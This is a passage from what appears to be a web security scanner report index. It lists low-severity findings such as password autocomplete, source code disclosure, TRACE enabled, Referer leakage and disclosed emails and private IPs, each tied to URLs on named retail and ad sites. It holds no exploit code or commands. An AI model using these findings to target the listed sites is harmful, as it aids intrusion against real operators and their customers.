13.163. http://www.gnc.com/recommendationpixel/user.jsp

13.164. http://www.guitarcenter.com/

13.165. http://www.imiclk.com/cgi/r.cgi

13.166. http://www.orderhouse.com/

13.167. http://www.petco.com/

13.168. http://www.petco.com/Secure/Login.aspx

13.169. http://www.redcrossstore.org/

13.170. http://www.restorationhardware.com/

13.171. http://www.restorationhardware.com/content/promo.jsp

13.172. http://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

13.173. https://www.restorationhardware.com/my-account/forgot-password.jsp

13.174. https://www.restorationhardware.com/my-account/register.jsp

13.175. https://www.restorationhardware.com/my-account/sign-in.jsp

13.176. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

13.177. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

13.178. http://www.toshibadirect.com/td/b2c/laptops.to

13.179. http://www22.glam.com/cTagsImgCmd.act

13.180. http://www26.orientaltrading.com/cm

14. Password field with autocomplete enabled

14.1. https://ordering.ftd.com/new-signup/

14.2. https://ordering.ftd.com/new-signup/

14.3. https://ordering.ftd.com/new-signup/

14.4. https://ordering.ftd.com/new-signup/

14.5. https://ordering.ftd.com/reminder-signin/

14.6. https://ordering.ftd.com/reminder-signin/

14.7. https://ordering.ftd.com/reminder-signin/

14.8. https://ordering.ftd.com/reminder-signin/

14.9. https://ordering.ftd.com/reminder-signin/

14.10. https://ordering.ftd.com/signin/

14.11. https://ordering.ftd.com/signin/

14.12. https://ordering.ftd.com/signin/

14.13. https://ordering.ftd.com/signin/

14.14. https://secure.bhphotovideo.com/bnh/controller/home

14.15. https://secure.bhphotovideo.com/bnh/controller/home

14.16. https://secure.bluenile.com/accounts/account-sign-in.html

14.17. https://secure.bluenile.com/accounts/account-sign-in.html

14.18. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

14.19. http://shoprunner.force.com/content/JsContentElementsGNC

14.20. http://shoprunner.force.com/content/JsContentElementsPET

14.21. https://www.acehardware.com/checkout/index.jsp

14.22. https://www.acehardware.com/checkout/index.jsp

14.23. https://www.armaniexchange.com/account/login.do

14.24. https://www.armaniexchange.com/account/login.do

14.25. http://www.bluefly.com/myfly/login.jsp

14.26. http://www.bluefly.com/myfly/login.jsp

14.27. http://www.footlocker.com/login/login_form.cfm

14.28. https://www.footlocker.com/account/default.cfm

14.29. https://www.footlocker.com/account/default/

14.30. http://www.ftd.com/

14.31. http://www.ftd.com/

14.32. http://www.ftd.com/

14.33. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

14.34. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

14.35. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

14.36. https://www.gnc.com/checkout/index.jsp

14.37. https://www.guitarcenter.com/MyAccount/Login.aspx

14.38. https://www.helzberg.com/account/login.do

14.39. https://www.orderhouse.com/default.aspx

14.40. https://www.orderhouse.com/dp.aspx

14.41. https://www.orderhouse.com/dp.aspx

14.42. https://www.petsmart.com/checkout/index.jsp

14.43. https://www.petsmart.com/checkout/index.jsp

14.44. https://www.redcrossstore.org/dp.aspx

14.45. https://www.restorationhardware.com/my-account/register.jsp

14.46. https://www.restorationhardware.com/my-account/sign-in.jsp

15. Source code disclosure

15.1. http://www.brookstone.com/brookstone.js

15.2. https://www.brookstone.com/brookstone.js

16. Referer-dependent response

16.1. http://action.media6degrees.com/orbserv/hbjs

16.2. http://ads.adbrite.com/adserver/vdi/684339

16.3. https://secure.bluenile.com/accounts/account-sign-in.html

16.4. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget

16.5. http://www.facebook.com/plugins/like.php

16.6. http://www.facebook.com/plugins/likebox.php

16.7. https://www.guitarcenter.com/MyAccount/Login.aspx

17. Cross-domain Referer leakage

17.1. http://american.redcross.org/site/PageServer

17.2. http://bp.specificclick.net/

17.3. http://bp.specificclick.net/

17.4. http://bp.specificclick.net/

17.5. http://buy.travelguard.com/TGI2/proc/stateselector.aspx

17.6. http://cm.g.doubleclick.net/pixel

17.7. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

17.8. http://fls.doubleclick.net/activityi

17.9. http://fls.doubleclick.net/activityi

17.10. http://fls.doubleclick.net/activityi

17.11. http://fls.doubleclick.net/activityi

17.12. http://fls.doubleclick.net/activityi

17.13. http://fls.doubleclick.net/activityi

17.14. http://hire.jobvite.com/CompanyJobs/Careers.aspx

17.15. http://html.aggregateknowledge.com/iframe

17.16. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

17.17. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

17.18. http://t.p.mybuys.com/webrec/wr.do

17.19. http://t.p.mybuys.com/webrec/wr.do

17.20. http://t.p.mybuys.com/webrec/wr.do

17.21. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

17.22. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

17.23. http://www.acehardware.com/category/index.jsp

17.24. http://www.acehardware.com/home/index.jsp

17.25. http://www.acehardware.com/home/index.jsp

17.26. https://www.acehardware.com/checkout/index.jsp

17.27. http://www.bhphotovideo.com/bnh/controller/home

17.28. http://www.bluefly.com/myfly/login.jsp

17.29. http://www.bluenile.com/build-your-own-diamond-ring

17.30. http://www.bluenile.com/engagement-rings

17.31. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html

17.32. http://www.brookstone.com/outdoor-living.html

17.33. https://www.brookstone.com/formhandlerservlet

17.34. http://www.facebook.com/plugins/like.php

17.35. http://www.facebook.com/plugins/like.php

17.36. http://www.facebook.com/plugins/likebox.php

17.37. https://www.footlocker.com/account/default.cfm

17.38. http://www.gnc.com/home/index.jsp

17.39. https://www.gnc.com/checkout/index.jsp

17.40. http://www.guitarcenter.com/

17.41. https://www.guitarcenter.com/MyAccount/Login.aspx

17.42. https://www.helzberg.com/account/login.do

17.43. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home

17.44. http://www.imiclk.com/cgi/r.cgi

17.45. http://www.imiclk.com/cgi/r.cgi

17.46. http://www.imiclk.com/cgi/r.cgi

17.47. http://www.imiclk.com/cgi/r.cgi

17.48. http://www.petco.com/

17.49. http://www.petco.com/Secure/Login.aspx

17.50. http://www.petsmart.com/

17.51. https://www.petsmart.com/checkout/index.jsp

17.52. http://www.redcrossstore.org/Shopper/Product.aspx

17.53. http://www.redcrossstore.org/dp.aspx

17.54. http://www.redcrossstore.org/shopper/prodlist.aspx

17.55. https://www.redcrossstore.org/dp.aspx

17.56. http://www.restorationhardware.com/content/promo.jsp

17.57. https://www.restorationhardware.com/my-account/sign-in.jsp

17.58. http://www.siteadvisor.com/download/windows.html

17.59. http://www.toshibadirect.com/td/b2c/laptops.to

17.60. http://www.toshibadirect.com/td/b2c/laptops.to

18. Cross-domain script include

18.1. http://buy.travelguard.com/TGI2/proc/stateselector.aspx

18.2. http://fls.doubleclick.net/activityi

18.3. http://fls.doubleclick.net/activityi

18.4. http://fls.doubleclick.net/activityi

18.5. http://hire.jobvite.com/CompanyJobs/Careers.aspx

18.6. https://ordering.ftd.com/new-signup/

18.7. https://ordering.ftd.com/reminder-signin/

18.8. https://ordering.ftd.com/signin/

18.9. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

18.10. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

18.11. http://shop.pacsun.com/home.jsp

18.12. http://subscriptions.marvel.com/

18.13. http://subscriptions.marvel.com/checkout/

18.14. https://subscriptions.marvel.com/checkout/

18.15. http://www.acehardware.com/category/index.jsp

18.16. http://www.acehardware.com/home/index.jsp

18.17. https://www.acehardware.com/checkout/index.jsp

18.18. http://www.armaniexchange.com/category/womens.do

18.19. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

18.20. http://www.bluefly.com/

18.21. http://www.bluenile.com/

18.22. http://www.bluenile.com/build-your-own-diamond-ring

18.23. http://www.bluenile.com/engagement-rings

18.24. http://www.brookstone.com/

18.25. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html

18.26. http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

18.27. http://www.brookstone.com/outdoor-living.html

18.28. http://www.brookstone.com/shoppingCart.jsp.vr

18.29. https://www.brookstone.com/formhandlerservlet

18.30. http://www.facebook.com/plugins/like.php

18.31. http://www.facebook.com/plugins/likebox.php

18.32. http://www.footlocker.com/

18.33. https://www.footlocker.com/account/default.cfm

18.34. https://www.footlocker.com/account/default/

18.35. http://www.ftd.com/

18.36. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

18.37. http://www.gnc.com/community/index.jsp%20%20

18.38. http://www.gnc.com/home/index.jsp

18.39. https://www.gnc.com/checkout/index.jsp

18.40. http://www.guitarcenter.com/

18.41. https://www.guitarcenter.com/MyAccount/Login.aspx

18.42. http://www.helzberg.com/

18.43. https://www.helzberg.com/account/login.do

18.44. http://www.homedepot.ca/catalog/concrete/173198

18.45. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home

18.46. http://www.orientaltrading.com/

18.47. http://www.petco.com/

18.48. http://www.petsmart.com/

18.49. https://www.petsmart.com/checkout/index.jsp

18.50. http://www.redcrossstore.org/

18.51. http://www.redcrossstore.org/dp.aspx

18.52. http://www.redcrossstore.org/shopper/prodlist.aspx

18.53. http://www.siteadvisor.com/download/windows.html

18.54. http://www.toshibadirect.com/td/b2c/laptops.to

18.55. https://www.toshibadirect.com/td/b2c/myaccount.to

18.56. http://www.travelguard.com/

19. TRACE method is enabled

19.1. http://ads.al.com/

19.2. http://bp.specificclick.net/

19.3. http://d.xp1.ru4.com/

19.4. http://image2.pubmatic.com/

19.5. http://img.bluenile.com/

19.6. http://login.dotomi.com/

19.7. http://media.gnc.com/

19.8. http://media.gsimedia.net/

19.9. http://metrics.pacsun.com/

19.10. http://pixel.rubiconproject.com/

19.11. http://pixel.traveladvertising.com/

19.12. http://s.xp1.ru4.com/

19.13. http://secure-us.imrworldwide.com/

19.14. http://srv.clickfuse.com/

19.15. http://sv.liveclicker.net/

19.16. http://wasc.homedepot.ca/

19.17. https://www.toshibadirect.com/

20. Email addresses disclosed

20.1. http://ads.adbrite.com/adserver/vdi/684339

20.2. http://ads.adbrite.com/adserver/vdi/684339

20.3. http://ads.adbrite.com/adserver/vdi/684339

20.4. http://buy.travelguard.com/tgi2/js/siteCatalyst.js

20.5. http://hire.jobvite.com/CompanyJobs/Careers.aspx

20.6. http://hire.jobvite.com/CompanyJobs/careers_8.js

20.7. https://ordering.ftd.com/new-signup/

20.8. https://ordering.ftd.com/reminder-signin/

20.9. https://ordering.ftd.com/signin/

20.10. http://pics.bluenile.com/1526758349/bundles/diamondsearch.js

20.11. https://secure.bhphotovideo.com/FrameWork/js/common.js

20.12. https://secure.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js

20.13. https://secure.bluenile.com/accounts/account-sign-in.html

20.14. http://shop.pacsun.com/home.jsp

20.15. http://shoprunner.force.com/content/JsContentElementsGNC

20.16. http://shoprunner.force.com/content/JsContentElementsPET

20.17. http://static.bhphotovideo.com/FrameWork/js/common.js

20.18. http://www.acehardware.com/js/LIB_core.js

20.19. https://www.acehardware.com/checkout/index.jsp

20.20. https://www.acehardware.com/common/checkout/js/jsu-1.0.js

20.21. https://www.acehardware.com/js/LIB_core.js

20.22. http://www.armaniexchange.com/category/customer+service/where+is+my+order/check+order+status.do

20.23. http://www.bhphotovideo.com/FrameWork/js/common.js

20.24. http://www.bhphotovideo.com/FrameWork/js/jquery/jquery.placeHolder.js

20.25. http://www.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js

20.26. http://www.bluenile.com/

20.27. http://www.bluenile.com/build-your-own-diamond-ring

20.28. http://www.bluenile.com/engagement-rings

20.29. http://www.brookstone.com/protoculous_102.js

20.30. https://www.brookstone.com/protoculous_102.js

20.31. http://www.ftd.com/

20.32. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

20.33. https://www.gnc.com/common/checkout/js/jsu-1.0.js

20.34. https://www.guitarcenter.com/includes/guitarcenter/GuitarCenter.css

20.35. https://www.guitarcenter.com/includes/guitarcenter/scripts/jquery.colorbox-min.js

20.36. https://www.helzberg.com/includes/jquery/plugins/jquery.hoverIntent.minified.js

20.37. http://www.petsmart.com/js/LIB_core.js

20.38. https://www.petsmart.com/checkout/index.jsp

20.39. https://www.petsmart.com/js/LIB_core.js

20.40. https://www.restorationhardware.com/assets/js/jquery/plugins/jquery.cookie.js

20.41. https://www.restorationhardware.com/assets/js/jquery/plugins/jquery.pngFix.js

20.42. http://www.travelguard.com/

21. Private IP addresses disclosed

21.1. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

21.2. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

21.3. http://rya.rockyou.com/ams/ptrck.php

21.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.5. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

21.6. http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/vnjkQm4QANt.js

21.7. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JS3nOGeZ6_r.js

21.8. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/fyAhkjMytaS.css

21.9. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png

21.10. http://subscriptions.marvel.com/

21.11. http://subscriptions.marvel.com/checkout/

21.12. https://subscriptions.marvel.com/checkout/

21.13. http://www.facebook.com/extern/login_status.php

21.14. http://www.facebook.com/extern/login_status.php

21.15. http://www.facebook.com/extern/login_status.php

21.16. http://www.facebook.com/extern/login_status.php

21.17. http://www.facebook.com/plugins/like.php

21.18. http://www.facebook.com/plugins/like.php

21.19. http://www.facebook.com/plugins/like.php

21.20. http://www.facebook.com/plugins/like.php

21.21. http://www.facebook.com/plugins/like.php

21.22. http://www.facebook.com/plugins/like.php

21.23. http://www.facebook.com/plugins/like.php

21.24. http://www.facebook.com/plugins/like.php

21.25. http://www.facebook.com/plugins/like.php

21.26. http://www.facebook.com/plugins/like.php

21.27. http://www.facebook.com/plugins/like.php

21.28. http://www.facebook.com/plugins/like.php

21.29. http://www.facebook.com/plugins/like.php

21.30. http://www.facebook.com/plugins/like.php

21.31. http://www.facebook.com/plugins/like.php

21.32. http://www.facebook.com/plugins/like.php

21.33. http://www.facebook.com/plugins/like.php

21.34. http://www.facebook.com/plugins/like.php

21.35. http://www.facebook.com/plugins/like.php

21.36. http://www.facebook.com/plugins/like.php

21.37. http://www.facebook.com/plugins/like.php

21.38. http://www.facebook.com/plugins/like.php

21.39. http://www.facebook.com/plugins/like.php

21.40. http://www.facebook.com/plugins/like.php

21.41. http://www.facebook.com/plugins/like.php

21.42. http://www.facebook.com/plugins/like.php

21.43. http://www.facebook.com/plugins/like.php

21.44. http://www.facebook.com/plugins/like.php

21.45. http://www.facebook.com/plugins/like.php

21.46. http://www.facebook.com/plugins/like.php

21.47. http://www.facebook.com/plugins/like.php

21.48. http://www.facebook.com/plugins/like.php

21.49. http://www.facebook.com/plugins/like.php

21.50. http://www.facebook.com/plugins/like.php

21.51. http://www.facebook.com/plugins/like.php

21.52. http://www.facebook.com/plugins/like.php

21.53. http://www.facebook.com/plugins/like.php

21.54. http://www.facebook.com/plugins/like.php

21.55. http://www.facebook.com/plugins/like.php

21.56. http://www.facebook.com/plugins/like.php

21.57. http://www.facebook.com/plugins/like.php

21.58. http://www.facebook.com/plugins/like.php

21.59. http://www.facebook.com/plugins/like.php

21.60. http://www.facebook.com/plugins/like.php

21.61. http://www.facebook.com/plugins/like.php

21.62. http://www.facebook.com/plugins/like.php

21.63. http://www.facebook.com/plugins/like.php

21.64. http://www.facebook.com/plugins/like.php

21.65. http://www.facebook.com/plugins/like.php

21.66. http://www.facebook.com/plugins/like.php

21.67. http://www.facebook.com/plugins/like.php

21.68. http://www.facebook.com/plugins/like.php

21.69. http://www.facebook.com/plugins/like.php

21.70. http://www.facebook.com/plugins/like.php

21.71. http://www.facebook.com/plugins/like.php

21.72. http://www.facebook.com/plugins/like.php

21.73. http://www.facebook.com/plugins/like.php

21.74. http://www.facebook.com/plugins/like.php

21.75. http://www.facebook.com/plugins/like.php

21.76. http://www.facebook.com/plugins/like.php

21.77. http://www.facebook.com/plugins/like.php

21.78. http://www.facebook.com/plugins/like.php

21.79. http://www.facebook.com/plugins/like.php

21.80. http://www.facebook.com/plugins/like.php

21.81. http://www.facebook.com/plugins/like.php

21.82. http://www.facebook.com/plugins/like.php

21.83. http://www.facebook.com/plugins/like.php

21.84. http://www.facebook.com/plugins/like.php

21.85. http://www.facebook.com/plugins/like.php

21.86. http://www.facebook.com/plugins/like.php

21.87. http://www.facebook.com/plugins/like.php

21.88. http://www.facebook.com/plugins/likebox.php

21.89. http://www.facebook.com/plugins/likebox.php

22. Robots.txt file

22.1. http://4qinvite.4q.iperceptions.com/1.aspx

22.2. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791

22.3. http://a.netmng.com/

22.4. http://a.rfihub.com/ca.gif

22.5. http://a.tribalfusion.com/i.cid

22.6. http://ace.imageg.net/graphics/product_images/pACE3-4403835th.jpg

22.7. http://action.media6degrees.com/orbserv/hbjs

22.8. http://ad.afy11.net/ad

22.9. http://ad.doubleclick.net/activity

22.10. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123

22.11. http://ads.undertone.com/f

22.12. http://altfarm.mediaplex.com/ad/bk/17038-128025-3840-0

22.13. http://american.redcross.org/site/PageServer

22.14. http://b.scorecardresearch.com/p

22.15. http://beacon.afy11.net/ad

22.16. http://bluefly-www.baynote.net/baynote/tags2/policy

22.17. http://bluefly.com/

22.18. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

22.19. http://buy.travelguard.com/TGI2/proc/stateselector.aspx

22.20. http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s05366524336859

22.21. http://cimg-1.restorationhardware.com/cm

22.22. http://cm.g.doubleclick.net/pixel

22.23. http://community.petco.com/n/pfx/forum.aspx

22.24. http://customerappreciation.petco.com/cm

22.25. http://d.xp1.ru4.com/activity

22.26. http://data.coremetrics.com/cm

22.27. http://dis.us.criteo.com/dis/dis.aspx

22.28. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

22.29. http://feeds.bbci.co.uk/news/rss.xml

22.30. http://fls.doubleclick.net/activityi

22.31. http://gnc.imageg.net/min-cat/site-css.xml.min.css

22.32. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052618686/

22.33. http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s01026654783636

22.34. http://hire.jobvite.com/CompanyJobs/Careers.aspx

22.35. http://images.scanalert.com/meter/www.mcafee.com/55.gif

22.36. http://login.dotomi.com/ucm/UCMController

22.37. http://marketlive.122.2o7.net/b/ss/mlhelzbprod/1/H.20.3/s05609032628126

22.38. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

22.39. http://media.gnc.com/ipixel

22.40. http://media.gsimedia.net/ipixel

22.41. http://media2.legacy.com/bind

22.42. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

22.43. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s04212323604151

22.44. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s06308770310133

22.45. http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s0464884343091

22.46. http://metrics.pacsun.com/b/ss/pacsuncom/1/H.21/s03375264031346

22.47. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s02726066182367

22.48. http://mlarmani.122.2o7.net/b/ss/mlax5prod/1/H.10-Pdvu-2/s03885870138183

22.49. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

22.50. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s07987988402601

22.51. https://ordering.ftd.com/signin/

22.52. http://pet.imageg.net/favicon.ico

22.53. http://pixel.mathtag.com/event/img

22.54. http://r.turn.com/r/beacon

22.55. http://rpt.footlocker.com/eluminate

22.56. http://rs.instantservice.com/resources/smartbutton/7664/44640/available.gif

22.57. http://s.petco.com/js_raw/mtagconfig.js

22.58. http://s.xp1.ru4.com/meta

22.59. https://secure.bhphotovideo.com/bnh/controller/home

22.60. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

22.61. http://segment-pixel.invitemedia.com/pixel

22.62. http://server.bhphotovideo.com/cm

22.63. http://shop.pacsun.com/home.jsp

22.64. http://srv.clickfuse.com/pixels/create.php

22.65. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.66. http://static.bhphotovideo.com/FrameWork/css/min/reset-fonts-layout.css

22.67. http://subscriptions.marvel.com/

22.68. https://subscriptions.marvel.com/checkout/

22.69. http://sv.liveclicker.net/service/api

22.70. http://sync.mathtag.com/sync/img

22.71. http://t.p.mybuys.com/webrec/wr.do

22.72. http://tag.admeld.com/pixel

22.73. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

22.74. http://tracking.searchmarketing.com/welcome.asp

22.75. http://trvlgrd.netmng.com/

22.76. http://uat.netmng.com/pixel/

22.77. http://wasc.homedepot.ca/b/ss/homedepotca/1/H.22.1/s06511195921339

22.78. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget

22.79. http://www.acehardware.com/home/index.jsp

22.80. https://www.acehardware.com/coreg/index.jsp

22.81. http://www.armaniexchange.com/category/womens.do

22.82. https://www.armaniexchange.com/account/login.do

22.83. http://www.bhphotovideo.com/bnh/controller/home

22.84. http://www.bluefly.com/__ssobj/ard.png

22.85. http://www.bluenile.com/

22.86. https://www.brookstone.com/imageservlet

22.87. http://www.facebook.com/plugins/like.php

22.88. http://www.footlocker.com/

22.89. https://www.footlocker.com/account/default.cfm

22.90. http://www.ftd.com/

22.91. http://www.gnc.com/home/index.jsp

22.92. https://www.gnc.com/coreg/index.jsp

22.93. http://www.google-analytics.com/__utm.gif

22.94. http://www.googleadservices.com/pagead/conversion/1052618686/

22.95. http://www.guitarcenter.com/

22.96. https://www.guitarcenter.com/MyAccount/Default.aspx

22.97. http://www.helzberg.com/

22.98. https://www.helzberg.com/account/login.do

22.99. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home

22.100. http://www.imiclk.com/cgi/r.cgi

22.101. http://www.linkedin.com/companyInsider

22.102. http://www.orderhouse.com/

22.103. https://www.orderhouse.com/default.aspx

22.104. http://www.orientaltrading.com/

22.105. http://www.petco.com/

22.106. http://www.petsmart.com/

22.107. https://www.petsmart.com/coreg/index.jsp

22.108. http://www.redcrossstore.org/

22.109. https://www.redcrossstore.org/Shopper/ContactInfo.aspx

22.110. http://www.res-x.com/ws/r2/Resonance.aspx

22.111. http://www.restorationhardware.com/

22.112. https://www.restorationhardware.com/my-account/sign-in.jsp

22.113. http://www.siteadvisor.com/download/windows.html

22.114. http://www.toshibadirect.com/td/b2c/laptops.to

22.115. https://www.toshibadirect.com/td/b2c/myaccount.to

22.116. http://www.travelguard.com/

22.117. http://www26.orientaltrading.com/cm

23. Cacheable HTTPS response

23.1. https://ordering.ftd.com/empty/index.epl

23.2. https://secure.bluenile.com/accounts/account-sign-in.html

23.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

23.4. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js

23.5. https://subscriptions.marvel.com/checkout/

23.6. https://subscriptions.marvel.com/favicon.ico

23.7. https://www.acehardware.com/include/emailSignup.html

23.8. https://www.armaniexchange.com/pageloading.html

23.9. https://www.footlocker.com/account/default.cfm

23.10. https://www.footlocker.com/account/default/

23.11. https://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm

23.12. https://www.guitarcenter.com/MyAccount/Login.aspx

23.13. https://www.orderhouse.com/default.aspx

23.14. https://www.orderhouse.com/dp.aspx

23.15. https://www.petsmart.com/helpdesk/password-pop-up.jsp

23.16. https://www.redcrossstore.org/dp.aspx

23.17. https://www.restorationhardware.com/my-account/forgot-password.jsp

23.18. https://www.restorationhardware.com/my-account/register.jsp

23.19. https://www.restorationhardware.com/my-account/sign-in.jsp

23.20. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

23.21. https://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

23.22. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

23.23. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

23.24. https://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

23.25. https://www.toshibadirect.com/td/b2c/headerAjax.jsp

23.26. https://www.toshibadirect.com/td/b2c/myaccount.to

24. Multiple content types specified

24.1. http://tags.mediaforge.com/if/50

24.2. http://tags.mediaforge.com/pix/50

25. HTML does not specify charset

25.1. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

25.2. http://fls.doubleclick.net/activityi

25.3. http://media.gnc.com/ipixel

25.4. http://media.gsimedia.net/ipixel

25.5. https://ordering.ftd.com/empty/index.epl

25.6. https://ordering.ftd.com/new-signup/

25.7. https://ordering.ftd.com/reminder-signin/

25.8. https://ordering.ftd.com/signin/

25.9. http://s.xp1.ru4.com/meta

25.10. https://secure.bhphotovideo.com/tryagainlater.html

25.11. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js

25.12. https://www.armaniexchange.com/pageloading.html

25.13. http://www.bhphotovideo.com/tryagainlater.html

25.14. http://www.bluenile.com/images2/spix.gif

25.15. http://www.ftd.com/

25.16. http://www.ftd.com/empty/tealeaf.epl

25.17. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

26. Content type incorrectly stated

26.1. http://a.monetate.net/trk/3/s/a-546f7653/p/petco.com/1785161427

26.2. http://a.monetate.net/trk/3/s/a-546f7653/p/petco.com/873421027

26.3. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1081786236

26.4. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1469778385

26.5. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1491479342

26.6. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1537867128

26.7. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1729776125

26.8. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/180141734

26.9. http://a.monetate.net/trk/3/s/a-835fc909/p/orientaltrading.com/927745947

26.10. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/1276278800

26.11. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/1821464581

26.12. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/2142672001

26.13. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791

26.14. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/598788637

26.15. http://a.netmng.com/

26.16. http://ace.imageg.net/graphics/product_images/pACE3-4403835th.jpg

26.17. http://action.media6degrees.com/orbserv/hbjs

26.18. http://app.gnc.com/profile/javascript/utils.js

26.19. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

26.20. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

26.21. http://eval.bizrate.com/js/survey_126457_1.js

26.22. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx

26.23. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

26.24. http://px.steelhousemedia.com/pr

26.25. http://rya.rockyou.com/ams/ptrck.php

26.26. http://s.xp1.ru4.com/meta

26.27. http://sales.liveperson.net/hcp/html/mTag.js

26.28. https://secure.bhphotovideo.com/images/!crd_prm!.!cm

26.29. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js

26.30. http://shop.pacsun.com/js/widget-qv-uc.jsp

26.31. http://sr2.liveperson.net/hcp/html/mTag.js

26.32. https://subscriptions.marvel.com/favicon.ico

26.33. http://trvlgrd.netmng.com/

26.34. http://www.facebook.com/extern/login_status.php

26.35. http://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm

26.36. http://www.footlocker.com/ns/hp/css/images/FL_Collections_arrow_l.gif

26.37. https://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm

26.38. http://www.linkedin.com/companyInsider

26.39. https://www.orderhouse.com/Navigation/DisplayImage.aspx

26.40. http://www.petco.com/Handlers/Navigation/MegaMenuHandler.ashx

26.41. http://www.res-x.com/ws/r2/Resonance.aspx

26.42. http://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

26.43. https://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

26.44. http://www.siteadvisor.com/images/logo.gif

26.45. http://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

26.46. http://www.toshibadirect.com/td/b2c/headerAjax.jsp

26.47. https://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

26.48. https://www.toshibadirect.com/td/b2c/headerAjax.jsp

27. Content type is not specified

27.1. https://secure.bluenile.com/favicon.ico

27.2. http://www.bluenile.com/favicon.ico

27.3. http://www.helzberg.com/

27.4. https://www.helzberg.com/account/login.do

27.5. https://www.helzberg.com/account/passwordrecovery.do

28. SSL certificate

28.1. https://ordering.ftd.com/

28.2. https://secure.bhphotovideo.com/

28.3. https://secure.bluenile.com/

28.4. https://secure.homedepot.ca/

28.5. https://secure.orientaltrading.com/

28.6. https://subscriptions.marvel.com/

28.7. https://www.acehardware.com/

28.8. https://www.armaniexchange.com/

28.9. https://www.brookstone.com/

28.10. https://www.footlocker.com/

28.11. https://www.gnc.com/

28.12. https://www.guitarcenter.com/

28.13. https://www.helzberg.com/

28.14. https://www.orderhouse.com/

28.15. https://www.petsmart.com/

